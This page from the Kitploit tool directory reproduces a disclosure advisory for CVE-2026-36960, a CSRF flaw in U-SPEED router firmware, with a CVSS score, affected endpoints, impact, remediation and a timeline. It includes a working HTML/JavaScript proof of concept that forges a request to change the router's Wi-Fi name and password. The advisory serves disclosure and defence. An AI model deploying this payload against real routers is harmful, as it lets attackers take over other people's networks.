Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-36960 — Proof-of-concept exploit for CVE-2026-36960, a CSRF vulnerability in U-SPEED Router firmware allowing unauthorized configuration changes via forged requests. | Kitploit
Tools/GitHubGitHub/kirubel-cve/cve-2026-36960
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubkirubel-cve/cve-2026-36960

CVE-2026-36960

Proof-of-concept exploit for CVE-2026-36960, a CSRF vulnerability in U-SPEED Router firmware allowing unauthorized configuration changes via forged requests.

View Repository
3 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-36960: Cross-Site Request Forgery (CSRF) in Web Management Interface

CVE ID: CVE-2026-36960 Date: 2026-04-29 Discoverer: Kirubel Solomne Vendor: U-SPEED Product: U-SPEED Router Firmware Version: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)


Description

The U-SPEED Router firmware V1.0.0 does not implement CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints. If an authenticated administrator visits the malicious webpage, the router processes the request as a legitimate administrative action.


CVSS Score

CVSS v3.1 Score: 8.8 (High) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MetricValue
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionRequired
Confidentiality ImpactHigh
Integrity ImpactHigh
Availability ImpactHigh

Affected Endpoints

EndpointFunction
/api/setWlanWireless network configuration
/api/telnetTelnet service configuration
Other config endpointsVarious administrative functions

Proof of Concept

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Expected Behavior: Request should be rejected due to missing CSRF token. Actual Behavior: Router accepts and processes the forged request.


Impact

  • Unauthorized modification of router configuration
  • WiFi network takeover
  • Telnet service manipulation
  • Denial of service for legitimate users

Remediation

  • Implement anti-CSRF tokens on all state-changing endpoints
  • Enforce strict Origin and Referer header validation
  • Use SameSite=Strict cookie attribute

Disclosure Timeline

DateEvent
2026-04-29Vulnerability discovered
2026-04-29Reported to MITRE
2026-04-29CVE-2026-36960 assigned
2026-04-29Public disclosure

References

  • MITRE CVE-2026-36960
  • CWE-352
  • Vendor Website
Download Tool